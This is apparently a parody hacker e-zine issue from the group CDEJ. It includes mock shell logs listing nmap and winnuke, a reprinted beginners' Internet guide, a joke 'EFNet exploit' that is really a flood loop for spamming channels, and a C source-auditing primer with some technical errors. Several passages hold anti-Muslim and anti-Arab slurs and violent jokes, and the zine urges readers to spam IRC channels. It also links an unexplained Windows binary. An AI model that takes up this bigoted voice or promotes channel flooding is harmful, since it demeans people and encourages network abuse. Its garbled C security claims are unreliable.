Copy Link
Add to Bookmark
Report
L elephants avec les trunks huge 02
****** SPECIAL NOTE: HOW TO GET CDEJ MEMBERSHIP ********
0 - cut this out and put on yer wall
1 - go to efnet and post this:
o< <(Help I have bird flu! QUACK)
to lots of channels.
2 - join #cdej
3 - let us abuse you for a year or so.
4 - yer in >:D< hugzzzzzz
********************************************************
l'elephant avec les trunks huge
izzue deux
___ ___
/ \____/ \
/ / __ \ \
/ |==Oo==| \ <--- mask cause halloween
\___/| |\___/\
| |_| |_| \ <(Peanuts pls.k.thx)
| |/|__|\| \
| |__| |\
| |__| |_/ / \
| @ | | @ || @ | '
| |~~| || | -The jelqing elephant-
'ooo' 'ooo''ooo'
"CDEJ -hacking for you since 1984"
LAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLA
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**
* *We are french and proud of it!* *
* *say NON! to turban sex* *
* *allez les bleus!* *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**
* *
* o0o big chief editor of this issue: o0o *
* -Clement De Jaune *
* *
**=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.**
* *
* here we go again! CDEJ hits one more time! *
* CDEJ-2 proudly presents to you top du shelf, *
* brand new hot 0days,warez,k0d3z,and the latests *
* in ascii fashion mode -fall/winter 2006 collection- *
* *
* "we are the backbone of the internet" *
* *
* -optiklenz 1999 (oldschool archive) *
**=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.**
*our newest member: monkey longarms *
* *
*car of the month: haqrmobile (mini cooper-s) *
* 5 years warranty, plus a lifetime *
* coupon of hair care products. *
* *
*MONTHLY ASCII: <:D> <-- monkey longarms! *
* *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.**
* *
*<zmda> smokin weed with ur mom can stimulate your reading *
* brain cells (limnus activa)and improves tremendously *
your hacking capabilities *
* *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.**
.oO h4l0w33n 1zzu3 ph3334rrrr 0o.
[.]................................................................[.]
[x]....................[ issue # 2 10/30]..........................[x]
[.]................................................................[.]
[x]=[000] intro and fanmail - cdej staff [x]
[.]................................................................[.]
[x]=[001] logs of hacks done - cdej staff [x]
[.]................................................................[.]
[x]=[002] internet for dummies - caroline p meinel [x]
[.]................................................................[.]
[x]=[003] how I 0wn3d efnet - anonom s. haqr [x]
[.]................................................................[.]
[x]=[004] basic c source auditing - playd0h [x]
[.]................................................................[.]
[x]=[005] Here's how we do DoS in Israel! - Sniff [x]
[.]................................................................[.]
[x]=[006] crashing dec-10s - the mentor (a cdej exclusive!) [x]
[.]................................................................[.]
[x]=[007] an introduction to tcp wrappers - lothos of LoU ph34r! [x]
[.]................................................................[.]
[x]=[010] my virus ph34r - lozcar [x]
[.]................................................................[.]
[000]..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..[0x00]
[I] [I]
[N] lelephant (CDEJ supreme high council) [N]
[T] -CEO (certified efnet oldschool) [T]
[R] [R]
[O] [O]
[000]..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..[0X00]
Folks,
let me start by saying this: HEH!
this goes to all of you people who thought we cou'ldnt make it this far
CDEJ-2 is here, phat, stylish, full of elitenss and wiser than evah!
some of you might have heard that we decided to shut down the
cult organisation. Some others filled the efnet underground channels
demanding explanation about this horrible decision to shut CDEJ down.
People went down on the streets... CNN phone lines flooded with callers
riots riots riots... the people wants the truth. GO AHEAD VOTE FOR GORE!
well, it is my utmost pleasure to announce to you that the CDEJ is going
to stay! (we only started the rumor for emotional sympathy and props)
well who the fuck knows what we're talking about, but who cares either?
thus the apathy of all you tv watching video game playing biznitches
has left us with the ultimate form of self esteem: APATHYYYYYYYYYY
And now some fanmail:
-------------------------------
Dear cdej:
I think that you stole all your last articles from the
new, unpublished b4b0. Is this true?
- tip
???????????????????????????????????????????
Dear 'tip':
Don't remember.
--
Dear cdej:
I am a haqr I used to haq on arpanet phear
also I lift weights.
- route (aka daemon9 (leet handle!))
??????????????????????????????????????????
Dear 'route':
k.....
-------------------------------
Dear cdej:
I am ali akbar khan usama and I am going to
suicide bomb cdej cause i think everyone should
be m*slim [ed note: i edited out the letter because
we at cdej refuse to say that filthy word]. Thx!
- 4-rab
????????????????????????????????????????????
Dear 4-rab:
Bring it on. All founding members of cdej carry
weaponry, some of which was removed from your
arab cousins' dead hands.
-------------------------------------------------------------------
********* SPECIAL ANOUNCEMENT *************
CDEJ is happy to announce our very own IRC
client (for windowz only folks). Download
here: http://w01f.org/cdejx.ace
screenshot: http://w01f.org/screenshot.jpg
*******GOGETITGOGETITGOGETITGOGETIT********
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
==========================================================
>-- What We Found on Other People's Computers
--< cdej staff
$ hostname
b4b0.org
$ whoami
tip
$ less .bash_history
mail
ls
echo "cdej is so elite i will haq them!" | mail mailinglist
man nmap
nmap cdej.org
man ssh
hmmmmm good thing i am a haqr
ssh cdej.org
ssh cdej.org
ssh cdej.org
ssh cdej.org
ssh cdej.org
ssh -h
ssh root@cdej.org
ssh root@cdej.org
nmap cdej.org
finger @cdej.org
tftp cdej.org
haq cdej.org
wardial cdej.org
winnuke cdej.org
echo "they are impenetrable!" | mail mailinglist
exit
===========================================================
>-- Internet for Dummies
--< Caroline P Meinel
[ EDITOR NOTE: We are so fortunate to have such a
wonderful guest in this issue! Enjoy! ]
Internet for Dummies -- skip this if you are a Unix wizard. But if you read
on you?ll get some more kewl hacking instructions.
____________________________________________________________
The six Guides to (mostly) Harmless Hacking of Vol. 1 jumped immediately
into how-to hacking tricks. But if you are like me, all those details of
probing ports and playing with hypotheses and pinging down hosts gets a
little dizzying.
So how about catching our breath, standing back and reviewing what the heck
it is that we are playing with? Once we get the basics under control, we
then can move on to serious hacking.
Also, I have been wrestling with my conscience over whether to start giving
you step-by-step instructions on how to gain root access to other peoples?
computers. The little angel on my right shoulder whispers, ?Gaining root
without permission on other people?s computers is not nice. So don?t tell
people how to do it.? The little devil on my left shoulder says, ?Carolyn,
all these hackers think you don?t know nothin?! PROOVE to them you know how
to crack!? The little angel says, ?If anyone reading Guide to (mostly)
Harmless Hacking tries out this trick, you might get in trouble with the law
for conspiracy to damage other peoples? computers.? The little devil says,
?But, Carolyn, tell people how to crack into root and they will think you
are KEWL!?
So here?s the deal. In this and the next few issues of Guide to (mostly)
Harmless Hacking I?ll tell you several ways to get logged on as the
superuser in the root account of some Internet host computers. But the
instructions will leave a thing or two to the imagination.
My theory is that if you are willing to wade through all this, you probably
aren?t one of those cheap thrills hacker wannabes who would use this
knowledge to do something destructive that would land you in jail.
*****************************
Technical tip: If you wish to become a *serious* hacker, you?ll need Linux
(a freeware variety of Unix) on your PC. One reason is that then you can
crack into root legally all you want -- on your own computer. It sure beats
struggling around on someone else?s computer only to discover that what you
thought was root was a cleverly set trap and the sysadmin and FBI laugh at
you all the way to jail.
Linux can be installed on a PC with as little as a 386 CPU, only 2 Mb RAM
and as little as 20 MB of hard disk. You will need to reformat your hard
disk. While some people have successfully installed Linux without trashing
their DOS/Windows stuff, don?t count on getting away with it. Backup,
backup, backup!
*****************************
*****************************
You can go to jail warning: Crack into root on someone else?s computer and
the slammer becomes a definite possibility. Think about this: when you see a
news story about some hacker getting busted, how often do you recognize the
name? How often is the latest bust being done to someone famous, like Dark
Tangent or se7en or Emmanuel Goldstein? How about, like, never! That?s
because really good hackers figure out how to not do stupid stuff. They
learn how to crack into computers for the intellectual challenge and to
figure out how to make computers safe from intruders. They don?t bull their
way into root and make a mess of things, which tends to inspire sysadmins to
call the cops.
*********************************
Exciting notice: Is it too boring to just hack into your own Linux machine?
Hang in there. Ira Winkler of the National Computer Security Association,
Dean Garlick of the Space Dynamics Lab of Utah State University and I are
working on setting up hack.net, a place where it will be legal to break into
computers. Not only that, we?re looking for sponsors who will give cash
awards and scholarships to those who show the greatest hacking skills. Now
does that sound like more phun than jail?
*****************************
So, let?s jump into our hacking basics tutorial with a look at the wondrous
anarchy that is the Internet.
Note that these Guides to (mostly) Harmless Hacking focus on the Internet.
That is because there are many legal ways to hack on the Internet. Also,
there are over 10 million of these readily hackable computers on the
Internet, and the number grows every day.
Internet Basics
No one owns the Internet. No one runs it. It was never planned to be what it
is today. It just happened, the mutant outgrowth of a 1969 US Defense
Advanced Research Projects Agency experiment.
This anarchic system remains tied together because its users voluntarily
obey some basic rules. These rules can be summed up in two words: Unix and
TCP/IP (with a nod to UUCP). If you understand, truly understand Unix and
TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace,
an Uberhacker among hacker wannabes, a master of the Internet universe.
To get technical, the Internet is a world-wide distributed
computer/communications network held together by a common communications
standard, Transmission Control Protocol/Internet Protocol (TCP/IP) and a bit
of UUCP. These standards allow anyone to hook up a computer to the Internet,
which then becomes another node in this network of the Internet. All that is
needed is to get an Internet address assigned to the new computer, which is
then known as an Internet "host," and tie into an Internet communications
link. These links are now available in almost all parts of the world.
If you use an on-line service from your personal computer, you, too, can
temporarily become part of the Internet. There are two main ways to hook up
to an on-line service.
There is the cybercouch potato connection that every newbie uses. It
requires either a point-to-point (PPP) or SLIPconnection, which allows you
to run pretty pictures with your Web browser. If you got some sort of
packaged software from your ISP, it automatically gives you this sort of
connection.
Or you can connect with a terminal emulator to an Internet host. This
program may be something as simple as the Windows 3.1 ?Terminal? program
under the ?Accessories? icon. Once you have dialed in and connected you are
just another terminal on this host machine. It won?t give you pretty
pictures. This connection will be similar to what you get on an
old-fashioned BBS. But if you know how to use this kind of connection, it
could even give you root access to that host.
But how is the host computer you use attached to the Internet? It will be
running some variety of the Unix operating system. Since Unix is so easy to
adapt to almost any computer, this means that almost any computer may become
an Internet host.
For example, I sometimes enter the Internet through a host which is a
Silicon Graphics Indigo computer at Utah State University. Its Internet
address is fantasia.idec.sdl.usu.edu. This is a computer optimized for
computer animation work, but it can also operate as an Internet host. On
other occasions the entry point used may be pegasus.unm.edu, which is an IBM
RS 6000 Model 370. This is a computer optimized for research at the
University of New Mexico.
Any computer which can run the necessary software -- which is basically the
Unix operating system -- has a modem, and is tied to an Internet
communications link, may become an Internet node. Even a PC may become an
Internet host by running one of the Linux flavors of Unix. After setting it
up with Linux you can arrange with the ISP of your choice to link it
permanently to the Internet.
In fact, many ISPs use nothing more than networked PCs running Linux!
As a result, all the computing, data storage, and sending, receiving and
forwarding of messages on the Internet is handled by the millions of
computers of many types and owned by countless companies, educational
institutions, governmental entities and even individuals.
Each of these computers has an individual address which enables it to be
reached through the Internet if hooked up to a appropriate communications
link. This address may be represented in two ways: as a name or a number.
The communications links of the Internet are also owned and maintained in
the same anarchic fashion as the hosts. Each owner of an Internet host is
responsible for finding and paying for a communications link that will get
that host tied in with at least one other host. Communications links may be
as simple as a phone line, a wireless data link such as cellular digital
packet data, or as complicated as a high speed fiber optic link. As long as
the communications link can use TCP/IP or UUCP, it can fit into the
Internet.
Thus the net grows with no overall coordination. A new owner of an Internet
host need only get permission to tie into one communications link to one
other host. Alternatively, if the provider of the communications link
decides this host is, for example, a haven for spammers, it can cut this
?rogue site? off of the Internet. The rogue site then must snooker some
other communications link into tying it into the Internet again.
The way most of these interconnected computers and communications links work
is through the common language of the TCP/IP protocol. Basically, TCP/IP
breaks any Internet communication into discrete "packets." Each packet
includes information on how to rout it, error correction, and the addresses
of the sender and recipient. The idea is that if a packet is lost, the
sender will know it and resend the packet. Each packet is then launched into
the Internet. This network may automatically choose a route from node to
node for each packet using whatever is available at the time, and
reassembles the packets into the complete message at the computer to which
it was addressed.
These packets may follow tortuous routes. For example, one packet may go
from a node in Boston to Amsterdam and back to the US for final destination
in Houston, while another packet from the same message might be routed
through Tokyo and Athens, and so on. Usually, however, the communications
links are not nearly so torturous. Communications links may include fiber
optics, phone lines and satellites.
The strength of this packet-switched network is that most messages will
automatically get through despite heavy message traffic congestion and many
communications links being out of service. The disadvantage is that messages
may simply disappear within the system. It also may be difficult to reach
desired computers if too many communications links are unavailable at the
time.
However, all these wonderful features are also profoundly hackable. The
Internet is robust enough to survive -- so its inventors claim -- even
nuclear war. Yet it is also so weak that with only a little bit of
instruction, it is possible to learn how to seriously spoof the system
(forged email) or even temporarily put out of commission other people's
Internet host computers (flood pinging, for example.)
On the other hand, the headers on the packets that carry hacking commands
will give away the account information from which a hacker is operating. For
this reason it is hard to hide perfectly when on the Internet.
It is this tension between this power and robustness and weakness and
potential for confusion that makes the Internet a hacker playground.
For example, HERE IS YOUR HACKER TIP YOU?VE BEEN WAITING FOR THIS ISSUE:
ftp://ftp.secnet.com
This ftp site was posted on the BUGTRAQ list, which is dedicated to
discussion of Unix security holes. Moderator is Aleph One, who is a genuine
Uberhacker. If you want to subscribe to the BUGTRAQ, email
LISTSERV@netspace.org with message ?subscribe BUGTRAQ.?
Now, back to Internet basics.
History of Internet
As mentioned above, the Internet was born as a US Advanced Research Projects
Agency (ARPA) effort in 1969. Its inventors called it ARPANET. But because
of its value in scientific research, the US National Science Foundation
(NSF) took it over in 1983. But over the years since then it gradually
evolved away from any single source of control. In April 1995 NSF cut the
last apron strings. Now the Internet is run by no one. It just happens and
grows out of the efforts of those who play with it and struggle with the
software and hardware.
Nothing at all like this has ever happened before. We now have a computer
system with a life of its own. We, as hackers, form a big part of the
mutation engine that keeps the Internet evolving and growing stronger. We
also form a big part of the immune system of this exotic creature.
The original idea of ARPANET was to design a computer and communications
network that would eventually become so redundant, so robust, and so able to
operate without centralized control, that it could even survive nuclear war.
What also happened was that ARPANET evolved into a being that has survived
the end of government funding without even a blip in its growth. Thus its
anarchic offspring, the Internet, has succeeded beyond the wildest dreams of
its original architects.
The Internet has grown explosively, with no end in sight. At its inception
as ARPANET it held only 4 hosts. A quarter of a century later, in 1984, it
contained only 1000 hosts. But over the next 5 years this number grew
tenfold to 10,000 (1989). Over the following 4 years it grew another tenfold
to 1 million (1993). Two years later, at the end of 1995, the Internet was
estimated to have at least 6 million host computers. There are probably over
10 million now. There appears to be no end in sight yet to the incredible
growth of this mutant child of ARPANET.
In fact, one concern raised by the exponential growth in the Internet is
that demand may eventually far outrace capacity. Because now no entity owns
or controls the Internet, if the capacity of the communications links among
nodes is too small, and it were to become seriously bogged down, it might be
difficult to fix the problem.
For example, in 1988, Robert Morris, Jr. unleashed a "virus"-type program on
the Internet commonly known as the ?Morris Worm.? This virus would make
copies of itself on whatever computer it was on and then send copies over
communications links to other Internet hosts. (It used a bug in sendmail
that allowed access to root, allowing the virus to act as the superuser).
Quickly the exponential spread of this virus made the Internet collapse from
the communications traffic and disk space it tied up.
At the time the Internet was still under some semblance of control by the
National Science Foundation and was connected to only a few thousand
computers. The Net was shut down and all viruses purged from its host
computers, and then the Net was put back into operation. Morris, meanwhile,
was put in jail.
There is some concern that, despite improved security measures (for example,
"firewalls"), someone may find a new way to launch a virus that could again
shut down the Internet. Given the loss of centralized control, restarting it
could be much more time-consuming if this were to happen again.
But reestablishing a centralized control today like what existed at the time
of the ?Morris Worm? is likely to be impossible. Even if it were possible,
the original ARPANET architects were probably correct in their assessment
that the Net would become more susceptible for massive failure rather than
less if some centralized control were in place.
Perhaps the single most significant feature of today's Internet is this lack
of centralized control. No person or organization is now able to control the
Internet. In fact, the difficulty of control became an issue as early as its
first year of operation as ARPANET. In that year email was spontaneously
invented by its users. To the surprise of ARPANET's managers, by the second
year email accounted for the bulk of the communication over the system.
Because the Internet had grown to have a fully autonomous, decentralized
life of its own, in April 1995, the NSF quit funding NSFNET, the fiber
optics communications backbone which at one time had given NSF the
technology to control the system. The proliferation of parallel
communications links and hosts had by then completely bypassed any
possibility of centralized control.
There are several major features of the Internet:
* World Wide Web -- a hypertext publishing network and now the fastest
growing part of the Internet.
* email -- a way to send electronic messages
* Usenet -- forums in which people can post and view public messages
* telnet -- a way to login to remote Internet computers
* file transfer protocol -- a way to download files from remote Internet
computers
* Internet relay chat -- real-time text conversations -- used primarily by
hackers and other Internet old-timers
* gopher -- a way of cataloging and searching for information. This is
rapidly growing obsolete.
As you port surfers know, there are dozens of other interesting but less
well known services such as whois, finger, ping etc.
The World Wide Web
The World Wide Web is the newest major feature of the Internet, dating from
the spring of 1992. It consists of "Web pages," which are like pages in a
book, and links from specially marked words, phrases or symbols on each page
to other Web pages. These pages and links together create what is known as
"hypertext." This technique makes it possible to tie together many different
documents which may be written by many people and stored on many different
computers around the world into one hypertext document.
This technique is based upon the Universal Resource Locator (URL) standard,
which specifies how to hook up with the computer and access the files within
it where the data of a Web page may be stored.
A URL is always of the form http://<rest of address>, where <rest of
address> includes a domain name which must be registered with an
organization called InterNIC in order to make sure that two different Web
pages (or email addresses, or computer addresses) don't end up being
identical. This registration is one of the few centralized control features
of the Internet.
Here's how the hypertext of the World Wide Web works. The reader would come
to a statement such as "our company offers LTL truck service to all major US
cities." If this statement on the "Web page" is highlighted, that means that
a click of the reader's computer mouse will take him or her to a new Web
page with details. These may include complete schedules and a form to fill
out to order a pickup and delivery.
Some Web pages even offer ways to make electronic payments, usually through
credit cards.
However, the security of money transfers over the Internet is still a major
issue. Yet despite concerns with verifiability of financial transactions,
electronic commerce over the Web is growing fast. In its second full year of
existence, 1994, only some $17.6 million in sales were conducted over the
Web. But in 1995, sales reached $400 million. Today, in 1996, the Web is
jammed with commercial sites begging for your credit card information.
In addition, the Web is being used as a tool in the distribution of a new
form of currency, known as electronic cash. It is conceivable that, if the
hurdle of verifiability may be overcome, that electronic cash (often called
ecash) may play a major role in the world economy, simplifying international
trade. It may also eventually make national currencies and even taxation as
we know it obsolete.
Examples of Web sites where one may obtain ecash include the Mark Twain Bank
of St. Louis, MO (http://www.marktwain.com) and Digicash of Amsterdam, The
Netherlands (http://www.digicash.com).
The almost out-of-control nature of the Internet manifests itself on the
World Wide Web. The author of a Web page does not need to get permission or
make any arrangement with the authors of other Web pages to which he or she
wishes to establish links. Links may be established automatically simply by
programming in the URLs of desired Web page links.
Conversely, the only way the author of a Web page can prevent other people
from reading it or establishing hypertext links to it is to set up a
password protection system (or by not having communications links to the
rest of the Internet).
A problem with the World Wide Web is how to find things on it. Just as
anyone may hook a new computer up to the Internet, so also there is no
central authority with control or even knowledge of what is published where
on the World Wide Web. No one needs to ask permission of a central authority
to put up a Web page.
Once a user knows the address (URL) of a Web page, or at least the URL of a
Web page that links eventually to the desired page, then it is possible (so
long as communications links are available) to almost instantly hook up with
this page.
Because of the value of knowing URLs, there now are many companies and
academic institutions that offer searchable indexes (located on the Web) to
the World Wide Web. Automated programs such as Web crawlers search the Web
and catalog the URLs they encounter as they travel from hypertext link to
hypertext link. But because the Web is constantly growing and changing,
there is no way to create a comprehensive catalog of the entire Web.
Email
Email is the second oldest use of the Internet, dating back to the ARPAnet
of 1972. (The first use was to allow people to remotely log in to their
choice of one of the four computers on which ARPAnet was launched in 1971.)
There are two major uses of email: private communications, and broadcasted
email. When broadcasted, email serves to make announcements (one-way
broadcasting), and to carry on discussions among groups of people such as
our Happy Hacker list. In the group discussion mode, every message sent by
every member of the list is broadcasted to all other members.
The two most popular program types used to broadcast to email discussion
groups are majordomo and listserv.
Usenet
Usenet was a natural outgrowth of the broadcasted email group discussion
list. One problem with email lists is that there was no easy way for people
new to these groups to join them. Another problem is that as the group
grows, a member may be deluged with dozens or hundreds of email messages
each day.
In 1979 these problems were addressed by the launch of Usenet. Usenet
consists of news groups which carry on discussions in the form of "posts."
Unlike an email discussion group, these posts are stored, typically for two
weeks or so, awaiting potential readers. As new posts are submitted to a
news group, they are broadcast to all Internet hosts that are subscribed to
carry the news groups to which these posts belong.
With many Internet connection programs you can see the similarities between
Usenet and email. Both have similar headers, which track their movement
across the Net. Some programs such as Pine are sent up to send the same
message simultaneously to both email addresses and newsgroups. All Usenet
news readers allow you to email the authors of posts, and many also allow
you to email these posts themselves to yourself or other people.
Now, here is a quick overview of the Internet basics we plan to cover in the
next several issues of Guide to (mostly) Harmless Hacking:
1. Unix
We discuss ?shells? which allow one to write programs (?scripts?) that
automate complicated series of Unix commands. The reader is introduced to
the concept of scripts which perform hacking functions. We introduce Perl,
which is a shell programming language used for the most elite of hacking
scripts such as SATAN.
3. TCP/IP and UUCP
This chapter covers the communications links that bind together the Internet
from a hackers' perspective. Extra attention is given to UUCP since it is so
hackable.
4. Internet Addresses, Domain Names and Routers
The reader learns how information is sent to the right places on the
Internet, and how hackers can make it go to the wrong places! How to look up
UUCP hosts (which are not under the domain name system) is included.
5. Fundamentals of Elite Hacking: Ports, Packets and File Permissions
This section lets the genie of serious hacking out of the bottle. It offers
a series of exercises in which the reader can enjoy gaining access to almost
any randomly chosen Internet host. In fact, by the end of the chapter the
reader will have had the chance to practice several dozen techniques for
gaining entry to other peoples' computers. Yet these hacks we teach are 100%
legal!
[ COPYRIGHT NOTICE REMOVED DUE TO DISPRESPECT FOR AUTHOR ]
===========================================================
>-- How I 0wn3d EFNet
--< Anonom S. Haqr
... Being bored one day on EFNet, having been banned from
a lot of places, a heroic young haqr sets out on a mission
to secure the Internet from all bad people everywhere.
Except arabs of course, because that would be prejudiced...
--------------------------------------------------------
ùíù [#hackersclub] Banned from channel
ùíù [#b4b0] Banned from channel
ùíù [#phrack] Banned from channel
ùíù [#2600] Banned from channel
ùíù [#glitterglam] Bad channel key (+k cookie)
ùíù [#oldschool] Bad channel key (+k ballin)
ùíù [#legions] Bad channel key (+k 00g)
ùíù [#phreak] Bad channel key (+k kpt)
ùíù [#espionage] Bad channel key (+k 613)
ùíù [#irchelp] Banned from channel
ùíù [#303] Banned from channel
[06:33pm][ttransien(+iw)][Mail: 1] [#cdej(+nt)]
[Lag 9928] [O/6 N/15 I/0 V/5 F/0]
[U:a:S:b:h]
[#cdej]
--------------------------------------------------------
One day, I decided to experiment with EFNet. I was banned
from a lot of channels; it was hard times.
This is obviously a sensitive topic; EFNet *is* the meaning
of life for many people around the world. But, as a good
whitehat haqr, it is my responsibility to expose these
vulnerabilities in proof-of-concept form to all the world.
I hope that by wearing a tie and sitting around coining new
terms in a desperate attempt to associate my computer security
hobby with business professionalism, I will somehow help bring
meaninglessness to my otherwise very meaningful life.
Enough self-justification. Here's the deal. I was minding
my own business, bothering everyone on EFNet for no reason,
when all of a sudden I came upon a potential vulnerability in
the IRC server software:
>>> You have been kicked off #irc by Freud_ (quit it)
"!!!" I thought to myself. I had been 'kicked' from an IRC
channel. Realizing that the so-called 'kick' routine was no
doubt programmed into the server software as a hash function
extrapolating binary-tree traversing for-loop, I began to make
a plan. The 'kick' had no doubt occured as the response to
some strange patern of stimuli I had introduced into the
channel. Let's look back and see if we spot a pattern.
--------------------------------------------------------
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
<ttransien> *** GAME OVER INSERT COIN ***
>>> You have been kicked off #irc by Freud_ (quit it)
-------------------------------------------------------
There did seem to be a definite pattern in the input that
caused the 'kick' to occur. Realizing this, I decided that
the server was possibly vulnerable to a DoS (Disk Operating
System) attack. I coded up a little something on my PCjr
and got to work exploiting the server:
------------------------------------------------------
>>> You have been kicked off #irc by Freud_ (quit it)
>>> You have been kicked off #hardware by pcgamer (stop repeating)
>>> You have been kicked off #M-a-t-h by Hille (stop repeating)
ùíù #M-a-t-h is desynced from ircd.desync.com at 06:00pm
>>> You have been kicked off #science by Nostrum (flood)
ùíù #science is desynced from ircd.arcti.ca at 06:00pm
>>> You have been kicked off #chanfix by Sentinel (Repeating dumbass
suppression)
ùíù #chanfix is desynced from hub.efnet.us at 06:01pm
------------------------------------------------------
GOOD GRACIOUS THE CHANNELS ARE DESYNCING. Whatever that
meant, it was at this point obvious that I was a haqr. The
reader will note that this was due entirely to my use of
certain exoteric technique, known in the computer
underground as 'k0dez'. I should also point out that this
was a hostile environment; efnet was trying to haq my
computer machine, perhaps in retaliation for my discovery.
I cite as a reference #M-a-t-h. I did *not* join this
channel. I joined #math and somehow wound up in this
other place. I was quite heroic during this whole
ordeal, and demand congratulations.
Moving along, I'm sure you're all at the edge of your
seats waiting for the aforementioned k0dez. Since
information probably wants to be free or some socialist
thing, here they are! 0day brought to you by #cdej@EFNet
(don't haq us!).
efnet_haq.c
-------- cut -------------------
char shellcode[] = "\x68\x65\x6c\x6c\x6f\x20\x74\x68\x65\x72\x65\x21";
while(1){
printf("*** GAME OVER INSERT COIN ***\n");
}
-------- cut -------------------
efnet_haq.c
===========================================================
>-- Basic C Source Auditing
--< Playd0h
The C programming language was devised in the early 1970s as a system
implementation language for the nascent
Unix operating system. Derived from the typeless language BCPL, it evolved a
type structure; created on
a tiny machine as a tool to improve a meager programming environment, it has
become one of the dominant
languages of today.
C came into being in the years 1969-1973, in parallel with the early
development of the Unix operating system;
the most creative period occurred during 1972. Another spate of changes
peaked between 1977 and
1979, when portability of the Unix system was being demonstrated.
C has grown from its humble roots in unix development into a vastly used and
elegant language, it has been the
tool of choice for many developers for many years, and even with the
development of a superset of C (C++) it
is still dominant in the programming universe.
As the language developed out of its roots, so did security holes, and
potentially dangerous functions, The aim
of this whitepaper is for you to explore and exploit these functions, and
learn how to code in C from the security
practitioners point of view, and ultimatly create more secure C programs.
There are severeal common vulnerable points in c code, this is normally due
to poor bounds checking or lack of,
functions such as : strcpy, sprintf, vsprintf, sscanf, gets; don't use
bounds checking, so it is easy overwrite
the buffer and depending on user privilleges execute commands or even
acquire a rootshell. Other functions such
as execve() or system() are dangerous as improper input checking, could lead
to remote command execution,
and depending on the privilileges of the user, it could result in
annihilation of your box, This is especially
common when you read from an external file, and do not escape special
characters. Another common mistake is
when an array is defined and the author forgets about the NULL byte, and
without bounds checking this can and
will end up with comprimisation.
-----Vulnerable Functions :
-----No bounds checking :
gets()
This functions is commonly used within programs, especially when the author
is a novice, as it is in general
one of the first input methods you learn. The problem with this function is
that it doesn't have any bounds
checking leaving the attacker to write over the buffer and gain the users
priviledges. resides in stdio.h
strcpy()
The strcpy() function copies the string pointed to by src (including the
terminating
\0' character) to the
array pointed to by dest. The strings may not overlap, and the destination
string dest must be large enough to
receive the copy. strncpy() is much safer as no more than n bytes of the
code is copied
strlen()
The strlen() function calculates the length of the string s, not including
the terminating
\0' character.
It resides in string.h. As it returns the number of characters in s it can
be overflowed easily by reading
more characters than the program's buffer allowed.
strcat()
The strcat() function appends the src string to the dest string overwriting
the
\0' character at the end of dest,
and then adds a terminating
\0' character. The strings may not overlap, and
the dest string must have enough
space for the result, therefore resulting in an overflow. The strncat() is
much safer as it only the first characters
of n or src are appended to the destination string. it resides in string.h
sprintf()
sprintf is used to format data and put it into a string array. It is
basically a printf and so uses the same
escape sequences and format identifers. Field length speicifiers can prevent
this. it resides in stdio.h
scanf() && fscanf()
The scanf function reads input from the standard input stream stdin ,
fscanf reads input from the stream pointer
stream. They are occasionally vulnerable unless the input field is limited.
-- Dangerous Functions with bounds checking :
strncpy() && snprintf()
Occasionally the author forgets to write a null byte at the end of the
string which can later result in copying of
the data to include other data. It is safer to use strncat() as the problem
does not exist with it.
----
When you are auditing code, look for input that is read directly into the
buffer as it can often result in comprimisation
of the computer the code is run on. A way to check for this is to try and
enter large strings and see the results, if
the program crashes its more than likely that you are able to exploit as the
input is being written past the buffer.
Also Incorrect bounds checking, as in, bounds checking that is scattered
over lots of lines of code, or is inacuratley
coded can result in various types of vulnerabilities.
Direct system calls, through execution pipes, execve() or system()
especially when they are called with dynamic arguments
is dangerous, and usually ends up with remote command execution.
Command line arguments (getopt) and evironment arguments (getenv) can also
be dangerous, as if they are not properly
escaped, or properly used they can lead to various vulnerabilities.
System / Network calls without timeouts (such as read) can lead to DoS
Library weaknesses. E.g. format bugs, glob bugs, and similar internal
weaknesses. (Specific code scanning tools can
often be used in these cases.)
Kernel weaknesses. E.g. fd_set glitches, socket options, and generally,
user-dependent usage of system calls,
especially network calls.
System facilities. Input from and output to facilities such as syslog,
ident, nfs, etc. without proper checking
A good way of finding simple yet easily preventable bugs i.e use of
vulnerable functions (strcpy,gets,sprintf etc)
